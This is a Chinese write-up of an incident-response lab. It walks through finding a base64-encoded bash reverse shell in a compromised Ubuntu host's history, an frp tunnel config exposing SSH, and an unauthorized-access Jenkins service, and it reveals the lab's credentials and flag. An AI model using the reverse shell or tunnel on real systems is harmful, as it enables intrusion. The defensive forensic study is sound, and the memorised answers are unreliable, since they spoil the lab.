小张是个刚入门的程序猿,在公司开发产品的时候突然被叫去应急,小张心想"早知道简历上不写会应急了",于是call了运维小王的电话,小王说"你面试的时候不是说会应急吗?伪造简历吗?真该死。"
3. 存在漏洞的服务(提示:7个字符)
4. 攻击者留下的flag(格式zgsf{})
6. 攻击者的ID名称
账户密码:zgsfsys/zgsfsys(root用户也是这个密码)
使用history命令,发现一段可疑编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE=
zgsfsys@ubuntu:~$ sudo -i
[sudo] password for zgsfsys:
root@ubuntu:~# ls
chuantou
root@ubuntu:~# cd chuantou
root@ubuntu:~/chuantou# ls
frpc frpc.toml system
root@ubuntu:~/chuantou# cat frpc.toml
serverAddr = "127.0.0.1"
serverPort = 7000
[[proxies]]
name = "Hack-Server"
type = "tcp"
localIP = "156.66.33.66"
localPort = 22
remotePort = 6000
root@ubuntu:~/chuantou#
在history中看到,有多次查看log文件的记录
查看日志发现,jenkins服务正在监听0.0.0.0:8080
发现存在未授权访问漏洞,所以存在漏洞的服务就是jenkins
攻击者留下的flag就是上面图中的,为
zgsf{gongzhonghaozhigongshanfangshiyanshi}
引用:
这个靶机确实“easy”了。
Copyright © 2019- zgxue.com 版权所有 京ICP备2021021884号-5
违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务